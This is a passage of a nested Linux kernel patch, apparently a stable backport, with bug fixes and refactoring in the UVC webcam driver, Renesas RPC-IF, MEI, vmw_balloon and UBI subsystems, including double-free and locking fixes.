+-		default:
++		if ((buffer[8] & 0x7f) > 2) {
+ 			uvc_dbg(dev, DESCR,
+ 				"device %d videostreaming interface %d: unknown DV format %u\n",
+ 				dev->udev->devnum,
+@@ -347,9 +330,6 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 			return -EINVAL;
+ 		}
+ 
+-		strlcat(format->name, buffer[8] & (1 << 7) ? " 60Hz" : " 50Hz",
+-			sizeof(format->name));
+-
+ 		format->fcc = V4L2_PIX_FMT_DV;
+ 		format->flags = UVC_FMT_FLAG_COMPRESSED | UVC_FMT_FLAG_STREAM;
+ 		format->bpp = 0;
+@@ -376,7 +356,7 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 		return -EINVAL;
+ 	}
+ 
+-	uvc_dbg(dev, DESCR, "Found format %s\n", format->name);
++	uvc_dbg(dev, DESCR, "Found format %p4cc", &format->fcc);
+ 
+ 	buflen -= buffer[0];
+ 	buffer += buffer[0];
+@@ -880,10 +860,8 @@ static int uvc_parse_vendor_control(struct uvc_device *dev,
+ 					       + n;
+ 		memcpy(unit->extension.bmControls, &buffer[23+p], 2*n);
+ 
+-		if (buffer[24+p+2*n] != 0)
+-			usb_string(udev, buffer[24+p+2*n], unit->name,
+-				   sizeof(unit->name));
+-		else
++		if (buffer[24+p+2*n] == 0 ||
++		    usb_string(udev, buffer[24+p+2*n], unit->name, sizeof(unit->name)) < 0)
+ 			sprintf(unit->name, "Extension %u", buffer[3]);
+ 
+ 		list_add_tail(&unit->list, &dev->entities);
+@@ -1007,15 +985,15 @@ static int uvc_parse_standard_control(struct uvc_device *dev,
+ 			memcpy(term->media.bmTransportModes, &buffer[10+n], p);
+ 		}
+ 
+-		if (buffer[7] != 0)
+-			usb_string(udev, buffer[7], term->name,
+-				   sizeof(term->name));
+-		else if (UVC_ENTITY_TYPE(term) == UVC_ITT_CAMERA)
+-			sprintf(term->name, "Camera %u", buffer[3]);
+-		else if (UVC_ENTITY_TYPE(term) == UVC_ITT_MEDIA_TRANSPORT_INPUT)
+-			sprintf(term->name, "Media %u", buffer[3]);
+-		else
+-			sprintf(term->name, "Input %u", buffer[3]);
++		if (buffer[7] == 0 ||
++		    usb_string(udev, buffer[7], term->name, sizeof(term->name)) < 0) {
++			if (UVC_ENTITY_TYPE(term) == UVC_ITT_CAMERA)
++				sprintf(term->name, "Camera %u", buffer[3]);
++			else if (UVC_ENTITY_TYPE(term) == UVC_ITT_MEDIA_TRANSPORT_INPUT)
++				sprintf(term->name, "Media %u", buffer[3]);
++			else
++				sprintf(term->name, "Input %u", buffer[3]);
++		}
+ 
+ 		list_add_tail(&term->list, &dev->entities);
+ 		break;
+@@ -1048,10 +1026,8 @@ static int uvc_parse_standard_control(struct uvc_device *dev,
+ 
+ 		memcpy(term->baSourceID, &buffer[7], 1);
+ 
+-		if (buffer[8] != 0)
+-			usb_string(udev, buffer[8], term->name,
+-				   sizeof(term->name));
+-		else
++		if (buffer[8] == 0 ||
++		    usb_string(udev, buffer[8], term->name, sizeof(term->name)) < 0)
+ 			sprintf(term->name, "Output %u", buffer[3]);
+ 
+ 		list_add_tail(&term->list, &dev->entities);
+@@ -1073,10 +1049,8 @@ static int uvc_parse_standard_control(struct uvc_device *dev,
+ 
+ 		memcpy(unit->baSourceID, &buffer[5], p);
+ 
+-		if (buffer[5+p] != 0)
+-			usb_string(udev, buffer[5+p], unit->name,
+-				   sizeof(unit->name));
+-		else
++		if (buffer[5+p] == 0 ||
++		    usb_string(udev, buffer[5+p], unit->name, sizeof(unit->name)) < 0)
+ 			sprintf(unit->name, "Selector %u", buffer[3]);
+ 
+ 		list_add_tail(&unit->list, &dev->entities);
+@@ -1106,10 +1080,8 @@ static int uvc_parse_standard_control(struct uvc_device *dev,
+ 		if (dev->uvc_version >= 0x0110)
+ 			unit->processing.bmVideoStandards = buffer[9+n];
+ 
+-		if (buffer[8+n] != 0)
+-			usb_string(udev, buffer[8+n], unit->name,
+-				   sizeof(unit->name));
+-		else
++		if (buffer[8+n] == 0 ||
++		    usb_string(udev, buffer[8+n], unit->name, sizeof(unit->name)) < 0)
+ 			sprintf(unit->name, "Processing %u", buffer[3]);
+ 
+ 		list_add_tail(&unit->list, &dev->entities);
+@@ -1137,10 +1109,8 @@ static int uvc_parse_standard_control(struct uvc_device *dev,
+ 		unit->extension.bmControls = (u8 *)unit + sizeof(*unit);
+ 		memcpy(unit->extension.bmControls, &buffer[23+p], n);
+ 
+-		if (buffer[23+p+n] != 0)
+-			usb_string(udev, buffer[23+p+n], unit->name,
+-				   sizeof(unit->name));
+-		else
++		if (buffer[23+p+n] == 0 ||
++		    usb_string(udev, buffer[23+p+n], unit->name, sizeof(unit->name)) < 0)
+ 			sprintf(unit->name, "Extension %u", buffer[3]);
+ 
+ 		list_add_tail(&unit->list, &dev->entities);
+@@ -2483,6 +2453,24 @@ static const struct usb_device_id uvc_ids[] = {
+ 	  .bInterfaceSubClass	= 1,
+ 	  .bInterfaceProtocol	= 0,
+ 	  .driver_info		= (kernel_ulong_t)&uvc_quirk_probe_minmax },
++	/* Logitech, Webcam C910 */
++	{ .match_flags		= USB_DEVICE_ID_MATCH_DEVICE
++				| USB_DEVICE_ID_MATCH_INT_INFO,
++	  .idVendor		= 0x046d,
++	  .idProduct		= 0x0821,
++	  .bInterfaceClass	= USB_CLASS_VIDEO,
++	  .bInterfaceSubClass	= 1,
++	  .bInterfaceProtocol	= 0,
++	  .driver_info		= UVC_INFO_QUIRK(UVC_QUIRK_WAKE_AUTOSUSPEND)},
++	/* Logitech, Webcam B910 */
++	{ .match_flags		= USB_DEVICE_ID_MATCH_DEVICE
++				| USB_DEVICE_ID_MATCH_INT_INFO,
++	  .idVendor		= 0x046d,
++	  .idProduct		= 0x0823,
++	  .bInterfaceClass	= USB_CLASS_VIDEO,
++	  .bInterfaceSubClass	= 1,
++	  .bInterfaceProtocol	= 0,
++	  .driver_info		= UVC_INFO_QUIRK(UVC_QUIRK_WAKE_AUTOSUSPEND)},
+ 	/* Logitech Quickcam Fusion */
+ 	{ .match_flags		= USB_DEVICE_ID_MATCH_DEVICE
+ 				| USB_DEVICE_ID_MATCH_INT_INFO,
+diff --git a/drivers/media/usb/uvc/uvc_entity.c b/drivers/media/usb/uvc/uvc_entity.c
+index 7c4d2f93d3513..cc68dd24eb42d 100644
+--- a/drivers/media/usb/uvc/uvc_entity.c
++++ b/drivers/media/usb/uvc/uvc_entity.c
+@@ -37,7 +37,7 @@ static int uvc_mc_create_links(struct uvc_video_chain *chain,
+ 			continue;
+ 
+ 		remote = uvc_entity_by_id(chain->dev, entity->baSourceID[i]);
+-		if (remote == NULL)
++		if (remote == NULL || remote->num_pads == 0)
+ 			return -EINVAL;
+ 
+ 		source = (UVC_ENTITY_TYPE(remote) == UVC_TT_STREAMING)
+diff --git a/drivers/media/usb/uvc/uvc_status.c b/drivers/media/usb/uvc/uvc_status.c
+index 7518ffce22edb..4a92c989cf335 100644
+--- a/drivers/media/usb/uvc/uvc_status.c
++++ b/drivers/media/usb/uvc/uvc_status.c
+@@ -6,6 +6,7 @@
+  *          Laurent Pinchart (laurent.pinchart@ideasonboard.com)
+  */
+ 
++#include <asm/barrier.h>
+ #include <linux/kernel.h>
+ #include <linux/input.h>
+ #include <linux/slab.h>
+@@ -309,5 +310,41 @@ int uvc_status_start(struct uvc_device *dev, gfp_t flags)
+ 
+ void uvc_status_stop(struct uvc_device *dev)
+ {
++	struct uvc_ctrl_work *w = &dev->async_ctrl;
++
++	/*
++	 * Prevent the asynchronous control handler from requeueing the URB. The
++	 * barrier is needed so the flush_status change is visible to other
++	 * CPUs running the asynchronous handler before usb_kill_urb() is
++	 * called below.
++	 */
++	smp_store_release(&dev->flush_status, true);
++
++	/*
++	 * Cancel any pending asynchronous work. If any status event was queued,
++	 * process it synchronously.
++	 */
++	if (cancel_work_sync(&w->work))
++		uvc_ctrl_status_event(w->chain, w->ctrl, w->data);
++
++	/* Kill the urb. */
+ 	usb_kill_urb(dev->int_urb);
++
++	/*
++	 * The URB completion handler may have queued asynchronous work. This
++	 * won't resubmit the URB as flush_status is set, but it needs to be
++	 * cancelled before returning or it could then race with a future
++	 * uvc_status_start() call.
++	 */
++	if (cancel_work_sync(&w->work))
++		uvc_ctrl_status_event(w->chain, w->ctrl, w->data);
++
++	/*
++	 * From this point, there are no events on the queue and the status URB
++	 * is dead. No events will be queued until uvc_status_start() is called.
++	 * The barrier is needed to make sure that flush_status is visible to
++	 * uvc_ctrl_status_event_work() when uvc_status_start() will be called
++	 * again.
++	 */
++	smp_store_release(&dev->flush_status, false);
+ }
+diff --git a/drivers/media/usb/uvc/uvc_v4l2.c b/drivers/media/usb/uvc/uvc_v4l2.c
+index 0774a11360c03..950b42d78a107 100644
+--- a/drivers/media/usb/uvc/uvc_v4l2.c
++++ b/drivers/media/usb/uvc/uvc_v4l2.c
+@@ -661,8 +661,6 @@ static int uvc_ioctl_enum_fmt(struct uvc_streaming *stream,
+ 	fmt->flags = 0;
+ 	if (format->flags & UVC_FMT_FLAG_COMPRESSED)
+ 		fmt->flags |= V4L2_FMT_FLAG_COMPRESSED;
+-	strscpy(fmt->description, format->name, sizeof(fmt->description));
+-	fmt->description[sizeof(fmt->description) - 1] = 0;
+ 	fmt->pixelformat = format->fcc;
+ 	return 0;
+ }
+diff --git a/drivers/media/usb/uvc/uvc_video.c b/drivers/media/usb/uvc/uvc_video.c
+index d2eb9066e4dcc..0d3a3b697b2d8 100644
+--- a/drivers/media/usb/uvc/uvc_video.c
++++ b/drivers/media/usb/uvc/uvc_video.c
+@@ -1352,7 +1352,9 @@ static void uvc_video_decode_meta(struct uvc_streaming *stream,
+ 	if (has_scr)
+ 		memcpy(stream->clock.last_scr, scr, 6);
+ 
+-	memcpy(&meta->length, mem, length);
++	meta->length = mem[0];
++	meta->flags  = mem[1];
++	memcpy(meta->buf, &mem[2], length - 2);
+ 	meta_buf->bytesused += length + sizeof(meta->ns) + sizeof(meta->sof);
+ 
+ 	uvc_dbg(stream->dev, FRAME,
+@@ -1965,6 +1967,17 @@ static int uvc_video_start_transfer(struct uvc_streaming *stream,
+ 			"Selecting alternate setting %u (%u B/frame bandwidth)\n",
+ 			altsetting, best_psize);
+ 
++		/*
++		 * Some devices, namely the Logitech C910 and B910, are unable
++		 * to recover from a USB autosuspend unless the alternate
++		 * setting of the streaming interface is toggled.
++		 */
++		if (stream->dev->quirks & UVC_QUIRK_WAKE_AUTOSUSPEND) {
++			usb_set_interface(stream->dev->udev, intfnum,
++					  altsetting);
++			usb_set_interface(stream->dev->udev, intfnum, 0);
++		}
++
+ 		ret = usb_set_interface(stream->dev->udev, intfnum, altsetting);
+ 		if (ret < 0)
+ 			return ret;
+diff --git a/drivers/media/usb/uvc/uvcvideo.h b/drivers/media/usb/uvc/uvcvideo.h
+index 1227ae63f85b7..33e7475d4e64a 100644
+--- a/drivers/media/usb/uvc/uvcvideo.h
++++ b/drivers/media/usb/uvc/uvcvideo.h
+@@ -74,6 +74,7 @@
+ #define UVC_QUIRK_RESTORE_CTRLS_ON_INIT	0x00000400
+ #define UVC_QUIRK_FORCE_Y8		0x00000800
+ #define UVC_QUIRK_FORCE_BPP		0x00001000
++#define UVC_QUIRK_WAKE_AUTOSUSPEND	0x00002000
+ 
+ /* Format flags */
+ #define UVC_FMT_FLAG_COMPRESSED		0x00000001
+@@ -264,8 +265,6 @@ struct uvc_format {
+ 	u32 fcc;
+ 	u32 flags;
+ 
+-	char name[32];
+-
+ 	unsigned int nframes;
+ 	struct uvc_frame *frame;
+ };
+@@ -559,6 +558,7 @@ struct uvc_device {
+ 	/* Status Interrupt Endpoint */
+ 	struct usb_host_endpoint *int_ep;
+ 	struct urb *int_urb;
++	bool flush_status;
+ 	u8 *status;
+ 	struct input_dev *input;
+ 	char input_phys[64];
+diff --git a/drivers/memory/renesas-rpc-if.c b/drivers/memory/renesas-rpc-if.c
+index 61c288d403750..7343dbb79c9f7 100644
+--- a/drivers/memory/renesas-rpc-if.c
++++ b/drivers/memory/renesas-rpc-if.c
+@@ -162,14 +162,36 @@ static const struct regmap_access_table rpcif_volatile_table = {
+ 	.n_yes_ranges	= ARRAY_SIZE(rpcif_volatile_ranges),
+ };
+ 
++struct rpcif_priv {
++	struct device *dev;
++	void __iomem *base;
++	void __iomem *dirmap;
++	struct regmap *regmap;
++	struct reset_control *rstc;
++	struct platform_device *vdev;
++	size_t size;
++	enum rpcif_type type;
++	enum rpcif_data_dir dir;
++	u8 bus_size;
++	u8 xfer_size;
++	void *buffer;
++	u32 xferlen;
++	u32 smcr;
++	u32 smadr;
++	u32 command;		/* DRCMR or SMCMR */
++	u32 option;		/* DROPR or SMOPR */
++	u32 enable;		/* DRENR or SMENR */
++	u32 dummy;		/* DRDMCR or SMDMCR */
++	u32 ddr;		/* DRDRENR or SMDRENR */
++};
+ 
+ /*
+  * Custom accessor functions to ensure SM[RW]DR[01] are always accessed with
+- * proper width.  Requires rpcif.xfer_size to be correctly set before!
++ * proper width.  Requires rpcif_priv.xfer_size to be correctly set before!
+  */
+ static int rpcif_reg_read(void *context, unsigned int reg, unsigned int *val)
+ {
+-	struct rpcif *rpc = context;
++	struct rpcif_priv *rpc = context;
+ 
+ 	switch (reg) {
+ 	case RPCIF_SMRDR0:
+@@ -205,7 +227,7 @@ static int rpcif_reg_read(void *context, unsigned int reg, unsigned int *val)
+ 
+ static int rpcif_reg_write(void *context, unsigned int reg, unsigned int val)
+ {
+-	struct rpcif *rpc = context;
++	struct rpcif_priv *rpc = context;
+ 
+ 	switch (reg) {
+ 	case RPCIF_SMWDR0:
+@@ -252,39 +274,18 @@ static const struct regmap_config rpcif_regmap_config = {
+ 	.volatile_table	= &rpcif_volatile_table,
+ };
+ 
+-int rpcif_sw_init(struct rpcif *rpc, struct device *dev)
++int rpcif_sw_init(struct rpcif *rpcif, struct device *dev)
+ {
+-	struct platform_device *pdev = to_platform_device(dev);
+-	struct resource *res;
++	struct rpcif_priv *rpc = dev_get_drvdata(dev);
+ 
+-	rpc->dev = dev;
+-
+-	rpc->base = devm_platform_ioremap_resource_byname(pdev, "regs");
+-	if (IS_ERR(rpc->base))
+-		return PTR_ERR(rpc->base);
+-
+-	rpc->regmap = devm_regmap_init(&pdev->dev, NULL, rpc, &rpcif_regmap_config);
+-	if (IS_ERR(rpc->regmap)) {
+-		dev_err(&pdev->dev,
+-			"failed to init regmap for rpcif, error %ld\n",
+-			PTR_ERR(rpc->regmap));
+-		return	PTR_ERR(rpc->regmap);
+-	}
+-
+-	res = platform_get_resource_byname(pdev, IORESOURCE_MEM, "dirmap");
+-	rpc->dirmap = devm_ioremap_resource(&pdev->dev, res);
+-	if (IS_ERR(rpc->dirmap))
+-		return PTR_ERR(rpc->dirmap);
+-	rpc->size = resource_size(res);
+-
+-	rpc->type = (uintptr_t)of_device_get_match_data(dev);
+-	rpc->rstc = devm_reset_control_get_exclusive(&pdev->dev, NULL);
+-
+-	return PTR_ERR_OR_ZERO(rpc->rstc);
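++	/*
++	 * Resource acquisition moved to rpcif_probe(); just hand the client
++	 * driver the few fields it needs.
++	 */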
++	rpcif->dev = dev;
++	rpcif->dirmap = rpc->dirmap;
++	rpcif->size = rpc->size;
++	return 0;
+ }
+ EXPORT_SYMBOL(rpcif_sw_init);
+ 
+-static void rpcif_rzg2l_timing_adjust_sdr(struct rpcif *rpc)
++static void rpcif_rzg2l_timing_adjust_sdr(struct rpcif_priv *rpc)
+ {
+ 	regmap_write(rpc->regmap, RPCIF_PHYWR, 0xa5390000);
+ 	regmap_write(rpc->regmap, RPCIF_PHYADD, 0x80000000);
+@@ -298,8 +299,9 @@ static void rpcif_rzg2l_timing_adjust_sdr(struct rpcif *rpc)
+ 	regmap_write(rpc->regmap, RPCIF_PHYADD, 0x80000032);
+ }
+ 
+-int rpcif_hw_init(struct rpcif *rpc, bool hyperflash)
++int rpcif_hw_init(struct rpcif *rpcif, bool hyperflash)
+ {
++	struct rpcif_priv *rpc = dev_get_drvdata(rpcif->dev);
+ 	u32 dummy;
+ 
+ 	pm_runtime_get_sync(rpc->dev);
+@@ -360,7 +362,7 @@ int rpcif_hw_init(struct rpcif *rpc, bool hyperflash)
+ }
+ EXPORT_SYMBOL(rpcif_hw_init);
+ 
+-static int wait_msg_xfer_end(struct rpcif *rpc)
++static int wait_msg_xfer_end(struct rpcif_priv *rpc)
+ {
+ 	u32 sts;
+ 
+@@ -369,7 +371,7 @@ static int wait_msg_xfer_end(struct rpcif *rpc)
+ 					USEC_PER_SEC);
+ }
+ 
+-static u8 rpcif_bits_set(struct rpcif *rpc, u32 nbytes)
++static u8 rpcif_bits_set(struct rpcif_priv *rpc, u32 nbytes)
+ {
+ 	if (rpc->bus_size == 2)
+ 		nbytes /= 2;
+@@ -382,9 +384,11 @@ static u8 rpcif_bit_size(u8 buswidth)
+ 	return buswidth > 4 ? 2 : ilog2(buswidth);
+ }
+ 
+-void rpcif_prepare(struct rpcif *rpc, const struct rpcif_op *op, u64 *offs,
++void rpcif_prepare(struct rpcif *rpcif, const struct rpcif_op *op, u64 *offs,
+ 		   size_t *len)
+ {
++	struct rpcif_priv *rpc = dev_get_drvdata(rpcif->dev);
++
+ 	rpc->smcr = 0;
+ 	rpc->smadr = 0;
+ 	rpc->enable = 0;
+@@ -468,8 +472,9 @@ void rpcif_prepare(struct rpcif *rpc, const struct rpcif_op *op, u64 *offs,
+ }
+ EXPORT_SYMBOL(rpcif_prepare);
+ 
+-int rpcif_manual_xfer(struct rpcif *rpc)
++int rpcif_manual_xfer(struct rpcif *rpcif)
+ {
++	struct rpcif_priv *rpc = dev_get_drvdata(rpcif->dev);
+ 	u32 smenr, smcr, pos = 0, max = rpc->bus_size == 2 ? 8 : 4;
+ 	int ret = 0;
+ 
+@@ -589,7 +594,7 @@ exit:
+ err_out:
+ 	if (reset_control_reset(rpc->rstc))
+ 		dev_err(rpc->dev, "Failed to reset HW\n");
+-	rpcif_hw_init(rpc, rpc->bus_size == 2);
++	rpcif_hw_init(rpcif, rpc->bus_size == 2);
+ 	goto exit;
+ }
+ EXPORT_SYMBOL(rpcif_manual_xfer);
+@@ -636,8 +641,9 @@ static void memcpy_fromio_readw(void *to,
+ 	}
+ }
+ 
+-ssize_t rpcif_dirmap_read(struct rpcif *rpc, u64 offs, size_t len, void *buf)
++ssize_t rpcif_dirmap_read(struct rpcif *rpcif, u64 offs, size_t len, void *buf)
+ {
++	struct rpcif_priv *rpc = dev_get_drvdata(rpcif->dev);
+ 	loff_t from = offs & (rpc->size - 1);
+ 	size_t size = rpc->size - from;
+ 
+@@ -670,8 +676,11 @@ EXPORT_SYMBOL(rpcif_dirmap_read);
+ 
+ static int rpcif_probe(struct platform_device *pdev)
+ {
++	struct device *dev = &pdev->dev;
+ 	struct platform_device *vdev;
+ 	struct device_node *flash;
++	struct rpcif_priv *rpc;
++	struct resource *res;
+ 	const char *name;
+ 	int ret;
+ 
+@@ -692,11 +701,40 @@ static int rpcif_probe(struct platform_device *pdev)
+ 	}
+ 	of_node_put(flash);
+ 
++	rpc = devm_kzalloc(&pdev->dev, sizeof(*rpc), GFP_KERNEL);
++	if (!rpc)
++		return -ENOMEM;
++
++	rpc->base = devm_platform_ioremap_resource_byname(pdev, "regs");
++	if (IS_ERR(rpc->base))
++		return PTR_ERR(rpc->base);
++
++	rpc->regmap = devm_regmap_init(dev, NULL, rpc, &rpcif_regmap_config);
++	if (IS_ERR(rpc->regmap)) {
++		dev_err(dev, "failed to init regmap for rpcif, error %ld\n",
++			PTR_ERR(rpc->regmap));
++		return	PTR_ERR(rpc->regmap);
++	}
++
++	res = platform_get_resource_byname(pdev, IORESOURCE_MEM, "dirmap");
++	rpc->dirmap = devm_ioremap_resource(dev, res);
++	if (IS_ERR(rpc->dirmap))
++		return PTR_ERR(rpc->dirmap);
++	rpc->size = resource_size(res);
++
++	rpc->type = (uintptr_t)of_device_get_match_data(dev);
++	rpc->rstc = devm_reset_control_get_exclusive(dev, NULL);
++	if (IS_ERR(rpc->rstc))
++		return PTR_ERR(rpc->rstc);
++
+ 	vdev = platform_device_alloc(name, pdev->id);
+ 	if (!vdev)
+ 		return -ENOMEM;
+ 	vdev->dev.parent = &pdev->dev;
+-	platform_set_drvdata(pdev, vdev);
++
++	rpc->dev = &pdev->dev;
++	rpc->vdev = vdev;
++	platform_set_drvdata(pdev, rpc);
+ 
+ 	ret = platform_device_add(vdev);
+ 	if (ret) {
+@@ -709,9 +747,9 @@ static int rpcif_probe(struct platform_device *pdev)
+ 
+ static int rpcif_remove(struct platform_device *pdev)
+ {
+-	struct platform_device *vdev = platform_get_drvdata(pdev);
++	struct rpcif_priv *rpc = platform_get_drvdata(pdev);
+ 
+-	platform_device_unregister(vdev);
++	platform_device_unregister(rpc->vdev);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/mfd/arizona-core.c b/drivers/mfd/arizona-core.c
+index cbf1dd90b70d5..b1c53e0407710 100644
+--- a/drivers/mfd/arizona-core.c
++++ b/drivers/mfd/arizona-core.c
+@@ -45,7 +45,7 @@ int arizona_clk32k_enable(struct arizona *arizona)
+ 	if (arizona->clk32k_ref == 1) {
+ 		switch (arizona->pdata.clk32k_src) {
+ 		case ARIZONA_32KZ_MCLK1:
+-			ret = pm_runtime_get_sync(arizona->dev);
++			ret = pm_runtime_resume_and_get(arizona->dev);
+ 			if (ret != 0)
+ 				goto err_ref;
+ 			ret = clk_prepare_enable(arizona->mclk[ARIZONA_MCLK1]);
+diff --git a/drivers/misc/mei/bus-fixup.c b/drivers/misc/mei/bus-fixup.c
+index 71fbf0bc84532..5eeb4d04c0962 100644
+--- a/drivers/misc/mei/bus-fixup.c
++++ b/drivers/misc/mei/bus-fixup.c
+@@ -151,7 +151,7 @@ static int mei_fwver(struct mei_cl_device *cldev)
+ 	ret = __mei_cl_send(cldev->cl, (u8 *)&req, sizeof(req), 0,
+ 			    MEI_CL_IO_TX_BLOCKING);
+ 	if (ret < 0) {
+-		dev_err(&cldev->dev, "Could not send ReqFWVersion cmd\n");
++		dev_err(&cldev->dev, "Could not send ReqFWVersion cmd ret = %d\n", ret);
+ 		return ret;
+ 	}
+ 
+@@ -163,7 +163,7 @@ static int mei_fwver(struct mei_cl_device *cldev)
+ 		 * Should be at least one version block,
+ 		 * error out if nothing found
+ 		 */
+-		dev_err(&cldev->dev, "Could not read FW version\n");
++		dev_err(&cldev->dev, "Could not read FW version ret = %d\n", bytes_recv);
+ 		return -EIO;
+ 	}
+ 
+@@ -376,7 +376,7 @@ static int mei_nfc_if_version(struct mei_cl *cl,
+ 	ret = __mei_cl_send(cl, (u8 *)&cmd, sizeof(cmd), 0,
+ 			    MEI_CL_IO_TX_BLOCKING);
+ 	if (ret < 0) {
+-		dev_err(bus->dev, "Could not send IF version cmd\n");
++		dev_err(bus->dev, "Could not send IF version cmd ret = %d\n", ret);
+ 		return ret;
+ 	}
+ 
+@@ -391,7 +391,7 @@ static int mei_nfc_if_version(struct mei_cl *cl,
+ 	bytes_recv = __mei_cl_recv(cl, (u8 *)reply, if_version_length, &vtag,
+ 				   0, 0);
+ 	if (bytes_recv < 0 || (size_t)bytes_recv < if_version_length) {
+-		dev_err(bus->dev, "Could not read IF version\n");
++		dev_err(bus->dev, "Could not read IF version ret = %d\n", bytes_recv);
+ 		ret = -EIO;
+ 		goto err;
+ 	}
+diff --git a/drivers/misc/vmw_balloon.c b/drivers/misc/vmw_balloon.c
+index 61a2be712bf7b..9ce9b9e0e9b63 100644
+--- a/drivers/misc/vmw_balloon.c
++++ b/drivers/misc/vmw_balloon.c
+@@ -1709,7 +1709,7 @@ static void __init vmballoon_debugfs_init(struct vmballoon *b)
+ static void __exit vmballoon_debugfs_exit(struct vmballoon *b)
+ {
+ 	static_key_disable(&balloon_stat_enabled.key);
+-	debugfs_remove(debugfs_lookup("vmmemctl", NULL));
++	debugfs_lookup_and_remove("vmmemctl", NULL);
+ 	kfree(b->stats);
+ 	b->stats = NULL;
+ }
+diff --git a/drivers/mtd/ubi/build.c b/drivers/mtd/ubi/build.c
+index a901f8edfa41d..7f65af1697519 100644
+--- a/drivers/mtd/ubi/build.c
++++ b/drivers/mtd/ubi/build.c
+@@ -468,6 +468,7 @@ static int uif_init(struct ubi_device *ubi)
+ 			err = ubi_add_volume(ubi, ubi->volumes[i]);
+ 			if (err) {
+ 				ubi_err(ubi, "cannot add volume %d", i);
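++				/* Don't let the error path free this volume twice. */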
++				ubi->volumes[i] = NULL;
+ 				goto out_volumes;
+ 			}
+ 		}
+@@ -663,6 +664,12 @@ static int io_init(struct ubi_device *ubi, int max_beb_per1024)
+ 	ubi->ec_hdr_alsize = ALIGN(UBI_EC_HDR_SIZE, ubi->hdrs_min_io_size);
+ 	ubi->vid_hdr_alsize = ALIGN(UBI_VID_HDR_SIZE, ubi->hdrs_min_io_size);
+ 
++	if (ubi->vid_hdr_offset && ((ubi->vid_hdr_offset + UBI_VID_HDR_SIZE) >
++	    ubi->vid_hdr_alsize)) {
++		ubi_err(ubi, "VID header offset %d too large.", ubi->vid_hdr_offset);
++		return -EINVAL;
++	}
++
+ 	dbg_gen("min_io_size      %d", ubi->min_io_size);
+ 	dbg_gen("max_write_size   %d", ubi->max_write_size);
+ 	dbg_gen("hdrs_min_io_size %d", ubi->hdrs_min_io_size);
+diff --git a/drivers/mtd/ubi/fastmap-wl.c b/drivers/mtd/ubi/fastmap-wl.c
+index 0ee452275578d..863f571f1adb5 100644
+--- a/drivers/mtd/ubi/fastmap-wl.c
++++ b/drivers/mtd/ubi/fastmap-wl.c
+@@ -146,13 +146,15 @@ void ubi_refill_pools(struct ubi_device *ubi)
+ 	if (ubi->fm_anchor) {
+ 		wl_tree_add(ubi->fm_anchor, &ubi->free);
+ 		ubi->free_count++;
++		ubi->fm_anchor = NULL;
+ 	}
+ 
+-	/*
+-	 * All available PEBs are in ubi->free, now is the time to get
+-	 * the best anchor PEBs.
+-	 */
+-	ubi->fm_anchor = ubi_wl_get_fm_peb(ubi, 1);
++	if (!ubi->fm_disabled)
++		/*
++		 * All available PEBs are in ubi->free; now is the time to get
++		 * the best anchor PEBs.
++		 */
++		ubi->fm_anchor = ubi_wl_get_fm_peb(ubi, 1);
+ 
+ 	for (;;) {
+ 		enough = 0;
+diff --git a/drivers/mtd/ubi/vmt.c b/drivers/mtd/ubi/vmt.c
+index 8fcc0bdf06358..2c867d16f89f7 100644
+--- a/drivers/mtd/ubi/vmt.c
++++ b/drivers/mtd/ubi/vmt.c
+@@ -464,7 +464,7 @@ int ubi_resize_volume(struct ubi_volume_desc *desc, int reserved_pebs)
+ 		for (i = 0; i < -pebs; i++) {
+ 			err = ubi_eba_unmap_leb(ubi, vol, reserved_pebs + i);
+ 			if (err)
+-				goto out_acc;
++				goto out_free;
+ 		}
+ 		spin_lock(&ubi->volumes_lock);
+ 		ubi->rsvd_pebs += pebs;
+@@ -512,8 +512,10 @@ out_acc:
+ 		ubi->avail_pebs += pebs;
+ 		spin_unlock(&ubi->volumes_lock);
+ 	}
++	return err;
++
+ out_free:
+-	kfree(new_eba_tbl);
++	ubi_eba_destroy_table(new_eba_tbl);
+ 	return err;
+ }
+ 
+@@ -580,6 +582,7 @@ int ubi_add_volume(struct ubi_device *ubi, struct ubi_volume *vol)
+ 	if (err) {
+ 		ubi_err(ubi, "cannot add character device for volume %d, error %d",
+ 			vol_id, err);
++		vol_release(&vol->dev);
+ 		return err;
+ 	}
+ 
+@@ -590,15 +593,14 @@ int ubi_add_volume(struct ubi_device *ubi, struct ubi_volume *vol)
+ 	vol->dev.groups = volume_dev_groups;
+ 	dev_set_name(&vol->dev, "%s_%d", ubi->ubi_name, vol->vol_id);
+ 	err = device_register(&vol->dev);
+-	if (err)
+-		goto out_cdev;
++	if (err) {
++		cdev_del(&vol->cdev);
++		put_device(&vol->dev);
++		return err;
++	}
+ 
+ 	self_check_volumes(ubi);
+ 	return err;
+-
+-out_cdev:
+-	cdev_del(&vol->cdev);
+-	return err;
+ }
+ 
+ /**
+diff --git a/drivers/mtd/ubi/wl.c b/drivers/mtd/ubi/wl.c
+index 68eb0f21b3fe2..9e14319225c97 100644
+--- a/drivers/mtd/ubi/wl.c
++++ b/drivers/mtd/ubi/wl.c
+@@ -890,8 +890,11 @@ static int wear_leveling_worker(struct ubi_device *ubi, struct ubi_work *wrk,
+ 
+ 	err = do_sync_erase(ubi, e1, vol_id, lnum, 0);
+ 	if (err) {
+-		if (e2)
++		if (e2) {
++			spin_lock(&ubi->wl_lock);
+ 			wl_entry_destroy(ubi, e2);
++			spin_unlock(&ubi->wl_lock);
++		}
+ 		goto out_ro;
+ 	}
+ 
+@@ -973,11 +976,11 @@ out_error:
+ 	spin_lock(&ubi->wl_lock);
+ 	ubi->move_from = ubi->move_to = NULL;
+ 	ubi->move_to_put = ubi->wl_scheduled = 0;
++	wl_entry_destroy(ubi, e1);
++	wl_entry_destroy(ubi, e2);
+ 	spin_unlock(&ubi->wl_lock);
+ 
+ 	ubi_free_vid_buf(vidb);
+-	wl_entry_destroy(ubi, e1);
+-	wl_entry_destroy(ubi, e2);
+ 
+ out_ro:
+ 	ubi_ro_mode(ubi);
+@@ -1130,14 +1133,18 @@ static int __erase_worker(struct ubi_device *ubi, struct ubi_work *wl_wrk)
+ 		/* Re-schedule the LEB for erasure */
+ 		err1 = schedule_erase(ubi, e, vol_id, lnum, 0, false);
+ 		if (err1) {
++			spin_lock(&ubi->wl_lock);
+ 			wl_entry_destroy(ubi, e);
++			spin_unlock(&ubi->wl_lock);
+ 			err = err1;
+ 			goto out_ro;
+ 		}
+ 		return err;
+ 	}
+ 
++	spin_lock(&ubi->wl_lock);
+ 	wl_entry_destroy(ubi, e);
